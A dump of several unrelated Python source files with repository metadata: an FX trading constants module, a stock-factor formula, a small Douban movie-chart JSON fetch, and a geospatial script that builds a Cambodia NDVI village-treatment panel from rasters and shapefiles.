# BUSL_3_FNAME_PEAK_LIST = "44_3.2_11_file-io.EURJPY.Period-M5.Days-25000.Bars-25000.20180813_120112.SHRINK-1000.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_11_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180813_115015.SHRINK-100.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_11_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180813_115015.SHRINK-1000.csv"
# BUSL_3_FNAME_PEAK_LIST = \
# "44_3.2_11_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180813_115015" \
# + ".SHRINK-100.csv"
BUSL_3_FNAME_PEAK_LIST = \
"44_3.2_15_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180903_135341" \
+ ".2018-07.csv"
# + ".2018-08.csv"
# BUSL_3_FNAME_PEAK_LIST = \
# "44_3.2_15_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180903_135341" \
# + ".SHRINK-200.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_15_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180903_135341.SHRINK-100.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_15_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180903_135341.2018-08.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_15_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180903_135341.2018-07.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_15_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180903_135341.2018-06.csv"
BUSL_3_DPATH_PEAK_LIST = "C:\\WORKS_2\\WS\\WS_Others\\prog\\D-7\\2_2\\VIRTUAL\\Admin_Projects\\curr\\data\\csv_raw"
class Label_ColNames(Enum):
PAIR = 'PAIR'
PERIOD = 'PERIOD'
DAYS = 'DAYS'
SHIFT = 'SHIFT'
class PatternMatch(Enum) :
'''###################
get_AryOf_BarDatas_PatternMatched__RSI__V2
###################'''
PATTERNMATCH_NUMOFSEQUENCE_RSI = 3 # USED IN : get_AryOf_BarDatas_PatternMatched__RSI
RANGE_FLAT_RSI = 1.0 # USED IN : get_AryOf_BarDatas_PatternMatched__RSI
FLAG_UPDOWN_UP = 1 # USED IN : get_AryOf_BarDatas_PatternMatched__RSI
FLAG_UPDOWN_DOWN = 0 # USED IN : get_AryOf_BarDatas_PatternMatched__RSI
'''###################
get_AryOf_BarDatas_PatternMatched__Body_UpDown()
###################'''
VOLUMEOF_BODY = 0.05 # JPY
# VOLUMEOF_BODY = 0.1 # JPY
# VOLUMEOF_BODY = 0.15 # JPY
# VOLUMEOF_BODY = 0.20 # JPY
# VOLUMEOF_BODY = 0.25 # JPY
# VOLUMEOF_BODY = 0.30 # JPY
# VOLUMEOF_BODY = 0.35 # JPY
# VOLUMEOF_BODY = 0.40 # JPY
# VOLUMEOF_BODY = 0.45 # JPY
# VOLUMEOF_BODY = 0.5 # JPY
UPDOWN_PATTERN = [1,1,1,0]
class PairName(Enum) :
pair_Names = [
"USDJPY",
"EURJPY",
"AUDJPY",
"GBPJPY",
"EURUSD",
]
class ParamConstants(Enum):
'''###################
http://127.0.0.1:8000/curr/tester_BuyUps_SellLows/?command=BUSL_3&busl3_action=
key : busl3_action
###################'''
# key
PARAM_BUSL3_KEY__ACTION = "busl3_action"
# values
PARAM_BUSL3_CMD_2UPS = "busl3_command_2ups"
PARAM_BUSL3_CMD_3UPS = "busl3_command_3ups"
# PARAM_BUSL3_CMD_2UPS = "2ups"
'''###################
next_up
###################'''
PARAM_BUSL3_CMD_NEXTUP = "next_up"
PARAM_BUSL3_CMD_NEXTUP_ABOVE_BB_MAIN = "next_up_above_bb_main"
'''######################################
expert : busl3
######################################'''
'''###################
expert : busl3 : 1 : over BB.1S
###################'''
PARAM_BUSL3_CMD_EXPERT_1_OVER_BB_1S = "expert_busl3___1_over_bb_1s"
'''###################
expert : busl3 : 2 : up-up, down-down
###################'''
PARAM_BUSL3_CMD_EXPERT_2_UPUPS_DOWNDOWNS = "expert_busl3___2_upups_downdowns"
'''###################
utils : busl3 : 1 : UpsDowns_in_BB_Ranges
###################'''
PARAM_BUSL3_CMD_UTIL__1_UPSDOWNS_IN_BB_RANGES = \
"util_get_stats__1_upsdowns_in_bb_ranges"
'''######################################
utils : busl3 : 2 : research
######################################'''
'''###################
utils : busl3 : 2 : research / 1 : up-down pattern
###################'''
PARAM_BUSL3_CMD_RES__1_DETECT_PATTERNS__UPSDOWNS = \
"busl3_res__1_detect_patterns__updowns"
class Tester(Enum):
lo_Commands = [
["buy_Ups_Sell_Lows", "Buy ups, sell lows"],
# [1, "Numbering"],
# [2, "De-numbering"],
]
# http://127.0.0.1:8000/curr/tester_BuyUps_SellLows/?command=BUSL_3&
lo_Actions__BUSL__IDs = [
"1" # num of up bars and down bars in each of BB areas
, "2-1" # up-down pattern of 5 bars : log at detect_pattern.Updowns.XXX.log
]
lo_Actions__BUSL = [
[
lo_Actions__BUSL__IDs[0]
,"get stats for BB"
, ParamConstants.PARAM_BUSL3_CMD_UTIL__1_UPSDOWNS_IN_BB_RANGES.value
, "num of up bars and down bars in each of BB areas"
, "20180915_124138"
],
[
lo_Actions__BUSL__IDs[1]
,"res : pattern detection"
, ParamConstants.PARAM_BUSL3_CMD_RES__1_DETECT_PATTERNS__UPSDOWNS.value
, "up-down pattern of 5 bars : log at detect_pattern.Updowns.XXX.log"
, "20180915_125135"
],
]
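# A hypothetical sketch (not part of the original module) of how these
# constants might be consumed in a Django view:
#   action = request.GET.get(ParamConstants.PARAM_BUSL3_KEY__ACTION.value)
#   if action == ParamConstants.PARAM_BUSL3_CMD_UTIL__1_UPSDOWNS_IN_BB_RANGES.value:
#       ...  # run the "up/down bars per BB range" utility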
| UTF-8 | Python | false | false | 8,442 | py | 7 | cons_fx.py | 3 | 0.526297 | 0.41566 | 0 | 230 | 35.704348 | 121 |
menxinren/OFO_intern | 18,837,726,585,271 | 1c301a5eb8a590086c34597316d33794cd87e081 | e09fd6bd63eacb9ae17cd4cd0fcc5bbc0d06644b | /Factor10/Template/factor3.py | c6a8bac6343efd9d198e71951a3b069aa8d00cf0 | []
| no_license | https://github.com/menxinren/OFO_intern | 35d522346a9fc17e9faa927e4bd2715bd3255998 | 2e821547b67ba9a4d0bbdf0eeff7005b618286ca | refs/heads/master | 2020-03-12T05:28:25.832521 | 2018-05-02T02:40:57 | 2018-05-02T02:40:57 | 130,463,933 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #type3 - the intermediate variable of the factor is also a factor
def run_formula(dv):
import pandas as pd
import numpy as np
    #compute how many days ago (relative to today) the lowest and highest prices of the past n days occurred
t = dv.get_ts('quarter')
t = t.replace([3,6,9,12],np.nan)
temp = dv.get_ts('low')
temp = temp.reset_index([x for x in range(len(temp))])
n = 5
days_min= t[0:n]
for i in range(n,len(temp)):
c = i - temp[i-n:i].idxmin(axis=0)
c = c.to_frame().transpose()
c = c.drop(['trade_date'],axis=1)
days_min = days_min.append(c)
index = t.index
days_min = days_min.set_index(index)
temp = dv.get_ts('high')
temp = temp.reset_index([x for x in range(len(temp))])
days_max= t[0:n]
for i in range(n,len(temp)):
c = i - temp[i-n:i].idxmax(axis=0)
c = c.to_frame().transpose()
c = c.drop(['trade_date'],axis=1)
days_max = days_max.append(c)
days_max = days_max.set_index(index)
dv.remove_field('days_min')
dv.remove_field('days_max')
dv.append_df(days_max,'days_max')
dv.append_df(days_min,'days_min')
factor3 =dv.add_formula('factor3','(days_min<days_max)*(((close-Ts_Min(close,%s))/days_min)-(Ts_Max(close,%s)-Ts_Min(close,%s))/(days_max-days_min))+ (days_min>days_max)*((Ts_Max(close,%s)-Ts_Min(close,%s))/(days_min-days_max)-((Ts_Max(close,%s)-close)/days_max))'%(n,n,n,n,n,n),is_quarterly=False, add_data=True)
return factor3
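# A minimal illustration (plain pandas/numpy, not the jaqs DataView API used
# above) of the "days since the rolling extremum" idea:
#   import numpy as np, pandas as pd
#   s = pd.Series([3., 1., 4., 1., 5., 9., 2., 6.])
#   days_min = s.rolling(5).apply(lambda w: len(w) - 1 - np.argmin(w))
# days_min[i] says how many rows back the minimum of the last 5 values sits.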
| UTF-8 | Python | false | false | 1,351 | py | 21 | factor3.py | 18 | 0.642803 | 0.630617 | 0 | 37 | 34.459459 | 314 |
Yan199405/Python_note | 11,235,634,450,937 | c353b656f707a90451d1f77d7ba7a47d9c5e78df | 61459ef393c252cc52dc56d5ebafff7e055579aa | /图灵学院/v20.py | 53a3c4bfb9b21ba76bd6febe15b8b9078ebce56e | []
| no_license | https://github.com/Yan199405/Python_note | 5e56824b6ec347ab8af4f04b5070bdc5e6685b80 | d8fd0a83da280f80e7a3e9c535787afa7722e140 | refs/heads/master | 2020-06-13T01:17:33.696802 | 2019-08-12T00:28:17 | 2019-08-12T00:28:17 | 194,485,922 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
爬取豆瓣电影数据
了解ajax的基本
'''
from urllib import request
import json
url = 'https://movie.douban.com/j/chart/top_list?type=11&interval_id=100%3A90&action=&start=0&limit=1'
rsp = request.urlopen(url)
data = rsp.read().decode()
data = json.loads(data)
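# This endpoint pages through results via the `start`/`limit` query
# parameters; a hypothetical way to walk further pages (untested sketch):
#   for start in range(0, 100, 20):
#       page_url = url.replace('start=0&limit=1', 'start=%d&limit=20' % start)
#       page = json.loads(request.urlopen(page_url).read().decode())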
print(data) | UTF-8 | Python | false | false | 302 | py | 61 | v20.py | 38 | 0.684783 | 0.648551 | 0 | 15 | 16.533333 | 102 |
aiddata/cambodia_ndvi_eval | 11,587,821,786,559 | c0186476b78a661c8d767537a27f1d973abd3f80 | 233aa254e724f21a0bdd8b85a690d71e9995cf74 | /build_panel.py | c2cde931988f2e847492c290a1045a8f5173ed43 | []
| no_license | https://github.com/aiddata/cambodia_ndvi_eval | 1fe06b7e36cdf492dd568767f446581c18e039c0 | cdc229af965ec037d5401b334f255993c125f944 | refs/heads/master | 2021-08-01T19:04:46.100048 | 2021-07-30T18:31:40 | 2021-07-30T18:31:40 | 182,141,664 | 1 | 0 | null | false | 2019-10-04T18:34:29 | 2019-04-18T18:55:37 | 2019-08-26T15:00:18 | 2019-10-04T18:34:28 | 69 | 1 | 0 | 0 | Python | false | false |
# set a directory to store output data. I don't specify Box as the filepath because the
# output file is too large to store in Box. You will have to make sure
# in your temporary directory, you must have the dissolved buffered village shapefile,
# the Hansen treecover raster, NDVI raster data for 1999-2018 (separate files stored
# in a folder called "ndvi"), temperature rasters for 2001-2017 (separate files stored
# in a folder called "temperature"), precip rasters for 1999-2017 (separate files stored
# in a folder called "precipitation"), a plantations shapefile (in a folder called
# "plantations"), a concessions shapefile (in a folder called "concessions"), and a
# protected areas shapefile (in a folder called "protected_areas"), as well as the roads
# shapefile
working_dir = '/sciclone/home20/cbaehr/cambodia_gie/inputData'
out_dir = '/sciclone/home20/cbaehr/cambodia_gie/processedData'
# working_dir = 'C:/Users/cbaehr/Downloads'
# overwrite output files?
overwrite = True
import fiona
import itertools
import math
import numpy as np
import pandas as pd
from shapely.geometry import shape, Point, MultiPoint, MultiPolygon
from shapely.prepared import prep
import csv
from osgeo import gdal, ogr
import sys
import errno
import geopandas
from rasterio import features
from affine import Affine
from rasterstats.io import read_features
#################################################
# define function to extract raster values for each grid cell
def getValuesAtPoint(indir, rasterfileList, pos, lon, lat, cell_id):
    """For every point in pos, read the pixel value of each raster in
    rasterfileList; returns a DataFrame of ['cell_id', 'x', 'y'] plus one
    column per raster."""
    #gt(2) and gt(4) coefficients are zero, and the gt(1) is pixel width, and gt(5) is pixel height.
    #The (gt(0),gt(3)) position is the top left corner of the top left pixel of the raster.
for i, rs in enumerate(rasterfileList):
presValues = []
gdata = gdal.Open('{}/{}.tif'.format(indir,rs))
gt = gdata.GetGeoTransform()
band = gdata.GetRasterBand(1)
nodata = band.GetNoDataValue()
x0, y0 , w , h = gt[0], gt[3], gt[1], gt[5]
data = band.ReadAsArray().astype(np.float)
params = data.shape
#free memory
del gdata
if i == 0:
#iterate through the points
for p in pos.iterrows():
x = int((p[1][lon] - x0)/w)
y = int((p[1][lat] - y0)/h)
if y < params[0] and x < params[1]:
val = data[y,x]
else:
val = -9999
presVAL = [p[1][cell_id], p[1][lon], p[1][lat], val]
presValues.append(presVAL)
df = pd.DataFrame(presValues, columns=['cell_id', 'x', 'y', rs])
else:
#iterate through the points
for p in pos.iterrows():
x = int((p[1][lon] - x0)/w)
y = int((p[1][lat] - y0)/h)
if y < params[0] and x < params[1]:
val = data[y,x]
else:
val = -9999
presValues.append(val)
df[rs] = pd.Series(presValues)
del data, band
return df
# load in empty grid
grid = pd.read_csv(working_dir+'/empty_grid.csv')
##################################################
# list of file names for NDVI rasters
rasters = ['ndvi_'+str(year) for year in range(1999, 2019)]
# extract NDVI raster values for each grid cell
ndvi = getValuesAtPoint(indir=working_dir+'/ndvi', rasterfileList=rasters, pos=grid, lon='lon', lat='lat', cell_id='cell_id')
# merge NDVI data with main grid
full_grid = pd.concat([grid['cell_id'].reset_index(drop=True), ndvi.drop(['cell_id','x','y'], axis=1).reset_index(drop=True)], axis=1)
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
###
# list of file names for temperature rasters
rasters = ['temp_'+str(year) for year in range(2001, 2018)]
# extract temperature raster values for each grid cell
temp = getValuesAtPoint(indir=working_dir+'/temperature', rasterfileList=rasters, pos=grid, lon='lon', lat='lat', cell_id='cell_id')
# merge temperature data with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), temp.drop(['cell_id','x','y'], axis=1).reset_index(drop=True)], axis=1)
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
###
# list of file names for precipitation rasters
rasters = ['precip_'+str(year) for year in range(1999, 2018)]
# extract precipitation raster values for each grid cell
precip = getValuesAtPoint(indir=working_dir+'/precipitation', rasterfileList=rasters, pos=grid, lon='lon', lat='lat', cell_id='cell_id')
# merge precipitation data with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), precip.drop(['cell_id','x','y'], axis=1).reset_index(drop=True)], axis=1)
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
###
# list of file names for nighttime lights rasters
rasters = ['ntl_'+str(year) for year in range(1999, 2014)]
# extract nighttime lights raster values for each grid cell
ntl = getValuesAtPoint(indir=working_dir+'/ntl', rasterfileList=rasters, pos=grid, lon='lon', lat='lat', cell_id='cell_id')
# merge nighttime lights data with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), ntl.drop(['cell_id','x','y'], axis=1).reset_index(drop=True)], axis=1)
del ndvi, temp, precip, ntl
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
####################################################
# load plantations shapefile and prepare to merge with grid
plantations = fiona.open(working_dir+'/plantations/plantations.shp')
plantations = plantations[0]
plantations = shape(plantations['geometry'])
prep_plantations = prep(plantations)
# load concessions shapefile and prepare to merge with grid
concessions = fiona.open(working_dir+'/concessions/concessions.shp')
concessions = concessions[0]
concessions = shape(concessions['geometry'])
prep_concessions = prep(concessions)
# load protected areas shapefile and prepare to merge with grid
protected_areas = fiona.open(working_dir+'/protected_areas/protected_areas.shp')
protected_areas = protected_areas[0]
protected_areas = shape(protected_areas['geometry'])
prep_protected_areas = prep(protected_areas)
# create empty lists to store land designation dummies
plantations_col = []
concessions_col = []
protected_areas_col = []
# iterate through each grid cell to determine whether it intersects a plantation,
# concession, or PA
for _, row in grid.iterrows():
c = Point(row['lon'], row['lat'])
plantations_col.append(prep_plantations.intersects(c))
concessions_col.append(prep_concessions.intersects(c))
protected_areas_col.append(prep_protected_areas.intersects(c))
# create empty df to store land designation dummies
land_designation = pd.DataFrame()
land_designation.insert(loc=0, column='plantation', value=plantations_col)
land_designation.insert(loc=1, column='concession', value=concessions_col)
land_designation.insert(loc=2, column='protected_area', value=protected_areas_col)
# merge land designation df with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), land_designation.reset_index(drop=True)], axis=1)
del plantations, concessions, protected_areas, prep_plantations, prep_concessions, prep_protected_areas
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
#################################################
# load in road distance rasters and extract road distance values for each grid cell
road_distance = getValuesAtPoint(indir=working_dir, rasterfileList=['road_distance'], pos=grid, lon='lon', lat='lat', cell_id='cell_id')
# merge road distance data with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), road_distance['road_distance'].reset_index(drop=True)], axis=1)
del road_distance
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
####################################################
# load in treatment shapefile as geopandas data
treatment = geopandas.read_file(working_dir+'/buf_trt_villages/buf_trt_villages.shp')
# process treatment geometry and convert to geoDataFrame
geometry = [Point(xy) for xy in zip(grid.lon, grid.lat)]
crs = {'init': 'epsg:4326'}
gdf = geopandas.GeoDataFrame(grid['cell_id'], crs=crs, geometry=geometry)
# join treatment data with grid cells. Each grid cell will be assigned a number of
# treatments and when each treatment project was completed
treatment_grid = geopandas.sjoin(gdf, treatment[['end_years', 'geometry']], how='left', op='intersects')
treatment_grid = treatment_grid[['cell_id', 'end_years']]
# break up treatment information by year
treatment_grid = treatment_grid.pivot_table(['end_years'], 'cell_id', aggfunc='|'.join)
treatment_grid = treatment_grid['end_years'].tolist()
# this function converts treatment info from string to numeric
def build(year_str):
j = year_str.split('|')
return {i:j.count(i) for i in set(j)}
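# e.g. build('2004|2004|2007') returns {'2004': 2, '2007': 1}; the pivot above
# joined each cell's treatment end_years with '|', and build() counts per year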
# apply function to treatment data
year_dicts = list(map(build, treatment_grid))
# convert treatment data to pandas df
treatment = pd.DataFrame(year_dicts)
treatment = treatment.fillna(0)
# fill any empty years with zero values
for i in range(2003, 2019):
if str(i) not in treatment.columns:
treatment[str(i)] = 0
treatment = treatment.reindex(sorted(treatment.columns), axis=1)
# convert treatment count to cumulative count
treatment = treatment.apply(np.cumsum, axis=1)
# rename treatment columns
treatment.columns = ['trt_'+str(i) for i in range(2003, 2019)]
# merge treatment data with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), treatment.reset_index(drop=True)], axis=1)
###
# load in tiered treatment shapefile (1km, 2km, 3km)
multi_treatment = geopandas.read_file(working_dir+'/multi_buf_trt_villages/multi_buf_trt_villages.shp')
# build 1km treatment measure
treatment_grid_1k = geopandas.sjoin(gdf, multi_treatment[multi_treatment['dist']=='1000'], how='left', op='intersects')
treatment_grid_1k = treatment_grid_1k[['cell_id', 'end_years']]
treatment_grid_1k['end_years'] = treatment_grid_1k['end_years'].fillna('2002')
treatment_grid_1k = treatment_grid_1k.pivot_table(['end_years'], 'cell_id', aggfunc='|'.join, dropna=False, fill_value=np.nan)
treatment_grid_1k = treatment_grid_1k['end_years'].tolist()
year_dicts = list(map(build, treatment_grid_1k))
treatment_1k = pd.DataFrame(year_dicts)
treatment_1k.drop(['2002'], axis=1, inplace=True)
treatment_1k = treatment_1k.fillna(0)
for i in range(2003, 2019):
if str(i) not in treatment_1k.columns:
treatment_1k[str(i)] = 0
treatment_1k = treatment_1k.reindex(columns=sorted(treatment_1k.columns))
treatment_1k = treatment_1k.apply(np.cumsum, axis=1)
treatment_1k.columns = ['trt1k_'+str(i) for i in range(2003, 2019)]
# merge 1km treatment measure with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), treatment_1k.reset_index(drop=True)], axis=1)
###
# build 2km treatment measure
treatment_grid_2k = geopandas.sjoin(gdf, multi_treatment[multi_treatment['dist']=='2000'], how='left', op='intersects')
treatment_grid_2k = treatment_grid_2k[['cell_id', 'end_years']]
treatment_grid_2k['end_years'] = treatment_grid_2k['end_years'].fillna('2002')
treatment_grid_2k = treatment_grid_2k.pivot_table(['end_years'], 'cell_id', aggfunc='|'.join, dropna=False, fill_value=np.nan)
treatment_grid_2k = treatment_grid_2k['end_years'].tolist()
year_dicts = list(map(build, treatment_grid_2k))
treatment_2k = pd.DataFrame(year_dicts)
treatment_2k.drop(['2002'], axis=1, inplace=True)
treatment_2k = treatment_2k.fillna(0)
for i in range(2003, 2019):
if str(i) not in treatment_2k.columns:
treatment_2k[str(i)] = 0
treatment_2k = treatment_2k.reindex(columns=sorted(treatment_2k.columns))
treatment_2k = treatment_2k.apply(np.cumsum, axis=1)
treatment_2k.columns = ['trt2k_'+str(i) for i in range(2003, 2019)]
# merge 2km treatment measure with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), treatment_2k.reset_index(drop=True)], axis=1)
###
# build 3km treatment measure
treatment_grid_3k = geopandas.sjoin(gdf, multi_treatment[multi_treatment['dist']=='3000'], how='left', op='intersects')
treatment_grid_3k = treatment_grid_3k[['cell_id', 'end_years']]
treatment_grid_3k['end_years'] = treatment_grid_3k['end_years'].fillna('2002')
treatment_grid_3k = treatment_grid_3k.pivot_table(['end_years'], 'cell_id', aggfunc='|'.join, dropna=False, fill_value=np.nan)
treatment_grid_3k = treatment_grid_3k['end_years'].tolist()
year_dicts = list(map(build, treatment_grid_3k))
treatment_3k = pd.DataFrame(year_dicts)
treatment_3k.drop(['2002'], axis=1, inplace=True)
treatment_3k = treatment_3k.fillna(0)
for i in range(2003, 2019):
if str(i) not in treatment_3k.columns:
treatment_3k[str(i)] = 0
treatment_3k = treatment_3k.reindex(columns=sorted(treatment_3k.columns))
treatment_3k = treatment_3k.apply(np.cumsum, axis=1)
treatment_3k.columns = ['trt3k_'+str(i) for i in range(2003, 2019)]
# merge 3km treatment measure with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), treatment_3k.reset_index(drop=True)], axis=1)
del treatment, treatment_grid, treatment_grid_1k, treatment_1k, treatment_grid_2k, treatment_2k, treatment_grid_3k, treatment_3k, year_dicts, multi_treatment
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
#################################################
# load in province and commune shapefiles
provinces = geopandas.read_file(working_dir+'/KHM_ADM1/KHM_ADM1.shp')
communes = geopandas.read_file(working_dir+'/KHM_ADM3/KHM_ADM3.shp')
# merge grid cells with province data
gdf = geopandas.sjoin(gdf, provinces[['id', 'geometry']], how='left', op='intersects')
# merge grid cells with commune data
gdf = geopandas.sjoin(gdf.drop(['index_right'],axis=1), communes[['id', 'geometry']], how='left', op='intersects')
# rename ADM dataset
gdf = gdf[['id_left', 'id_right']]
gdf.columns = ['province', 'commune']
# merge ADM dataset with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), gdf[['province', 'commune']].reset_index(drop=True)], axis=1)
del geometry, gdf, provinces, communes
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
#################################################
# load in CGEO shapefiles and prepare for merging with grid cells
bombings = fiona.open(working_dir+'/cgeo/khmer_bombings/khmer_bombings.shp')
bombings = bombings[0]
bombings = shape(bombings['geometry'])
prep_bombings = prep(bombings)
burials = fiona.open(working_dir+'/cgeo/khmer_burials/khmer_burials.shp')
burials = burials[0]
burials = shape(burials['geometry'])
prep_burials = prep(burials)
memorials = fiona.open(working_dir+'/cgeo/khmer_memorials/khmer_memorials.shp')
memorials = memorials[0]
memorials = shape(memorials['geometry'])
prep_memorials = prep(memorials)
prisons = fiona.open(working_dir+'/cgeo/khmer_prisons/khmer_prisons.shp')
prisons = prisons[0]
prisons = shape(prisons['geometry'])
prep_prisons = prep(prisons)
# create empty lists to store Khmer exposure indicators for each grid cell
bombings_col = []
burials_col = []
memorials_col = []
prisons_col = []
# building Khmer exposure dummies
for _, row in grid.iterrows():
c = Point(row['lon'], row['lat'])
bombings_col.append(prep_bombings.intersects(c))
burials_col.append(prep_burials.intersects(c))
memorials_col.append(prep_memorials.intersects(c))
prisons_col.append(prep_prisons.intersects(c))
# combine Khmer exposure dummies into a pandas df
khmer_exposure = pd.DataFrame()
khmer_exposure.insert(loc=0, column='bombings', value=bombings_col)
khmer_exposure.insert(loc=1, column='burials', value=burials_col)
khmer_exposure.insert(loc=2, column='memorials', value=memorials_col)
khmer_exposure.insert(loc=3, column='prisons', value=prisons_col)
# merge Khmer dummies with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), khmer_exposure.reset_index(drop=True)], axis=1)
del bombings, burials, memorials, prisons, prep_bombings, prep_burials, prep_memorials, prep_prisons, bombings_col, burials_col, memorials_col, prisons_col, khmer_exposure
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
#################################################
# to use the reshaping function, need to have same number of columns for each time-variant measure
# so need to fill missing years with zero or NA values for some measures
for i in range(1999, 2003):
full_grid['trt_'+str(i)] = 0
full_grid['trt1k_'+str(i)] = 0
full_grid['trt2k_'+str(i)] = 0
full_grid['trt3k_'+str(i)] = 0
for i in list(range(1999, 2001))+[2018]:
full_grid['temp_'+str(i)] = 'NA'
full_grid['precip_2018'] = 'NA'
for i in range(2014, 2019):
full_grid['ntl_'+str(i)] = 'NA'
# reorder columns in main dataset
new_names = ['cell_id', 'commune', 'province', 'plantation', 'concession', 'protected_area', 'road_distance', 'bombings', 'burials', 'memorials', 'prisons'] + ['ndvi_' + str(i) for i in range(1999, 2019)] + ['trt_' + str(i) for i in range(1999, 2019)] + ['trt1k_' + str(i) for i in range(1999, 2019)] + ['trt2k_' + str(i) for i in range(1999, 2019)] + ['trt3k_' + str(i) for i in range(1999, 2019)] + ['temp_' + str(i) for i in range(1999, 2019)] + ['precip_' + str(i) for i in range(1999, 2019)] + ['ntl_' + str(i) for i in range(1999, 2019)]
full_grid = full_grid[new_names]
# drop observations with missing cell ID
full_grid.dropna(axis=0, subset=['cell_id'], inplace=True)
# write "pre panel" to csv file
if overwrite:
full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
# identify column indices for each time-variant measure. Will need these indices for reshaping
headers = [str(i) for i in range(1999, 2019)]
ndvi_index = ['ndvi' in i for i in full_grid.columns]
trt_index = ['trt' in i for i in full_grid.columns]
trt1k_index = ['trt1k' in i for i in full_grid.columns]
trt2k_index = ['trt2k' in i for i in full_grid.columns]
trt3k_index = ['trt3k' in i for i in full_grid.columns]
temp_index = ['temp' in i for i in full_grid.columns]
precip_index = ['precip' in i for i in full_grid.columns]
ntl_index = ['ntl' in i for i in full_grid.columns]
del full_grid
# reshape panel from wide to long form
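# Schematically, one wide row such as
#   cell_id=7, ..., ndvi_1999=0.41, ndvi_2000=0.43, ..., trt_1999=0, ...
# becomes twenty long rows, one per year (values here are made up):
#   7,1999,...,0.41,0,...
#   7,2000,...,0.43,0,...
# with cell_id and the time-invariant columns repeated on every row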
with open(out_dir+'/pre_panel.csv') as f, open(out_dir+'/panel.csv', 'w') as f2:
# first line of the csv is variable names
a=f2.write('cell_id,year,commune,province,plantation,concession,protected_area,road_distance,bombings,burials,memorials,prisons,ndvi,trt,trt1k,trt2k,trt3k,temp,precip,ntl\n')
# performing transformation one grid cell at a time
for i, line in enumerate(f):
if i != 0:
x = line.strip().split(',')
            cell, commune, province, plantation, concession, protected, distance, bombings, burials, memorials, prisons = x[0:11]
ndvi = list(itertools.compress(x, ndvi_index))
trt = list(itertools.compress(x, trt_index))
trt1k = list(itertools.compress(x, trt1k_index))
trt2k = list(itertools.compress(x, trt2k_index))
trt3k = list(itertools.compress(x, trt3k_index))
temp = list(itertools.compress(x, temp_index))
precip = list(itertools.compress(x, precip_index))
ntl = list(itertools.compress(x, ntl_index))
for year, ndvi_out, trt_out, trt1k_out, trt2k_out, trt3k_out, temp_out, precip_out, ntl_out in zip(headers, ndvi, trt, trt1k, trt2k, trt3k, temp, precip, ntl):
a=f2.write(','.join([cell, year, commune, province, plantation, concession, protected, distance, bombings, burials, memorials, prisons, ndvi_out, trt_out, trt1k_out, trt2k_out, trt3k_out, temp_out, precip_out, ntl_out])+'\n')
| UTF-8 | Python | false | false | 19,740 | py | 25 | build_panel.py | 14 | 0.686424 | 0.661905 | 0 | 465 | 41.445161 | 543 |
Einere/boostcamp_study | 13,365,938,240,339 | 173296a52c59895d33773e2fed773b3908526dbe | 18c241e02f09a40ace628531605ffceab65184f9 | /lgy/algorithm/10799 쇠막대기.py | 30919e44834b1e1aa0585fb622813e3b0dcae740 | [
"MIT"
]
| permissive | https://github.com/Einere/boostcamp_study | 54b18de2205dbfb9b9f532008e951d82cac8313f | 63a52253c0ee01354a81dcac6349cc84d738b9ca | refs/heads/master | 2020-06-08T22:37:24.675128 | 2019-07-05T06:24:38 | 2019-07-05T06:24:38 | 193,319,107 | 2 | 1 | MIT | false | 2019-07-05T05:08:50 | 2019-06-23T07:30:51 | 2019-07-03T06:03:27 | 2019-07-05T05:08:50 | 46 | 1 | 1 | 0 | Java | false | false | def main():
ans = 0
mystack = []
flag = False
paren = input()
intstack = []
for idx, ch in enumerate(paren): # O(n)
if ch == '(':
mystack.append(ch)
intstack.append(1)
flag = True
if ch == ')':
mystack.pop()
            if flag:
                # '()' right after '(' is a laser: it cuts every bar that is
                # still open, adding one piece per open bar
                if len(mystack) == 0:
                    intstack.pop()
                    continue
                intstack.pop()
                ans += len(intstack)
            else:
                # this ')' closes a bar, contributing its final piece
                ans += intstack[-1]
                intstack.pop()
flag = False
print(ans)
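# Sample from BOJ 10799: the input '()(((()())(())()))(())' yields 17.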
main() | UTF-8 | Python | false | false | 653 | py | 61 | 10799 쇠막대기.py | 54 | 0.382848 | 0.37366 | 0 | 33 | 18.818182 | 44 |
matibraun/mercadolibre_scrapper | 4,088,808,909,600 | 2d06d762aa331b32a596a25a30d9125f37a318cb | 65d975314010207027ebd50e733af53df2dc4d4f | /create_database.py | 01d9335bb79eab551e4108e32faa62e03f88b952 | []
